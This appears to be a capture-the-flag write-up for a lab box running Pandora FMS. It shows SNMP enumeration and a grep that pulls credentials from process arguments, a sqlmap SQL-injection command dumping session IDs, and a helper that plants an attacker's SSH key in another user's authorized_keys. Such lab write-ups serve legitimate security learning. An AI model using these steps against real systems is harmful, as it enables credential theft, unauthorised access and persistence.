snmp-check returned a lot, so I first missed the user & password and proceeded with snmpwalk.
Finding a tiny piece of info in vast output can be a pain.
Replacing “tar”, which was called without a full path, was the fun part.
00:17 feroxbuster
feroxbuster -u http://10.10.11.136 --force-recursion -C 404,405 -m GET,POST
00:31 UDP port scan
nmap -sU -v 10.10.11.136
00:39 SNMP enumeration
161/udp is SNMP here
sudo nmap -sU -A -Pn -n -p 161 --script=snmp-sysdescr 10.10.11.136
onesixtyone 10.10.11.136 -c /usr/share/doc/onesixtyone/dict.txt
snmp-check -p 161 10.10.11.136
Somehow I also tried snmpbulkwalk.
I decided not to raise the -Cr option, as a timeout happens when it is set greater than the default value (10).
This may be an issue with my local machine spec.
-t is the timeout in seconds; -Cr is the max-repetitions per GETBULK request.
snmpbulkwalk -Cr10 -c public -t 20 -v2c 10.10.11.136 . > snmpbulkwalk
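Added example (not from the original writeup) for the "needle in the snmpwalk haystack" problem noted above: instead of reading the whole dump, filter it down to HOST-RESOURCES-MIB hrSWRunParameters (.1.3.6.1.2.1.25.4.2.1.5), the OID that exposes the command-line arguments of every running process, and then grep those for credential-looking flags. The dump lines and the example_user/ExamplePassw0rd value are constructed sample data, not output from the box.

```shell
#!/bin/sh
# Added example, not from the original writeup. Narrows a large
# snmpwalk/snmpbulkwalk dump down to hrSWRunParameters entries
# (.1.3.6.1.2.1.25.4.2.1.5 = process command-line arguments), which is
# where credentials passed as CLI flags end up.

# Constructed sample in the numeric-OID form net-snmp prints when no MIBs
# are loaded (the "iso." prefix); the user/password values are made up.
sample_dump() {
    cat <<'EOF'
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP"
iso.3.6.1.2.1.25.4.2.1.4.520 = STRING: "/usr/sbin/cron"
iso.3.6.1.2.1.25.4.2.1.5.520 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.1122 = STRING: "-u example_user -p ExamplePassw0rd! --host 127.0.0.1"
iso.3.6.1.2.1.25.4.2.1.5.3 = STRING: ""
EOF
}

# Print hrSWRunParameters entries that look like they carry a credential.
# Matches both the numeric OID suffix and the symbolic name, so it works
# whether or not MIBs were resolved when the dump was taken.
triage_snmp_dump() {
    grep -E '25\.4\.2\.1\.5\.|hrSWRunParameters' "$1" \
      | grep -iE -- '(-u |-p |--user|--pass|password|passwd|pwd|secret|token)'
}

# Number of candidate lines, for a quick sanity check.
count_candidates() {
    triage_snmp_dump "$1" | wc -l | tr -d ' '
}

# Usage against the real dump from the command above:
# triage_snmp_dump snmpbulkwalk
```

The second grep is deliberately loose; on a real host expect a few false positives (e.g. daemons started with -p for a port), which are still far fewer lines than the full walk.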
01:31 ssh tunnel (binding local port 80 needs root; run with sudo or pick a high local port and adjust the URL below accordingly)
ssh -L 80:localhost:80 daniel@10.10.11.136
01:47 Pandora FMS 742: Critical Code Vulnerabilities
The vulnerability is well explained there, including why the SQL injection below reveals session IDs.
sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump
Adding your own pub key, so you can ssh in as matt
1. Prepare a new key pair for this purpose only:
ssh-keygen -f pandora.key
Then we have pandora.key & pandora.key.pub.
2. Create .ssh under matt's home directory and add an authorized_keys file (sshd ignores the file if these permissions are any looser):
mkdir ~/.ssh
chmod 700 ~/.ssh
touch ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
3. Copy & paste the contents of pandora.key.pub into authorized_keys (>> appends rather than overwriting):
echo '****pub key****' >> ~/.ssh/authorized_keys
4. Log in with the private key:
ssh -i pandora.key matt@10.10.11.136
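The four steps above as one idempotent shell function, added here as an example and not part of the original writeup. It sets the permissions sshd's default StrictModes requires on every run and appends the key only if that exact line is not already present. The home directory path and the key line are parameters; the placeholder key in the usage comment is not real key material.

```shell
#!/bin/sh
# Added example, not from the original writeup: install a public key into a
# user's authorized_keys. sshd (StrictModes yes by default) silently ignores
# authorized_keys when ~/.ssh or the file is writable by others, so the
# permissions are enforced every time rather than assumed.
install_authorized_key() {
    home_dir="$1"     # target user's home, e.g. /home/matt
    pubkey="$2"       # one line, the contents of pandora.key.pub
    ssh_dir="$home_dir/.ssh"
    auth_file="$ssh_dir/authorized_keys"

    mkdir -p "$ssh_dir" || return 1
    chmod 700 "$ssh_dir" || return 1
    touch "$auth_file" || return 1
    chmod 600 "$auth_file" || return 1

    # -x whole-line, -F literal: skip the append if the key is already there
    if grep -qxF "$pubkey" "$auth_file"; then
        return 0
    fi
    printf '%s\n' "$pubkey" >> "$auth_file"
}

# Helpers to verify the result after a run.
key_count() {
    grep -cxF "$2" "$1/.ssh/authorized_keys"
}
perm_string() {
    ls -ld "$1" | cut -c1-10
}

# Usage (hypothetical paths; generate the pair with ssh-keygen -f pandora.key):
# install_authorized_key /home/matt "$(cat pandora.key.pub)"
```

Running it twice leaves exactly one copy of the key, and `perm_string` should report `drwx------` for .ssh and `-rw-------` for authorized_keys before you try `ssh -i pandora.key`.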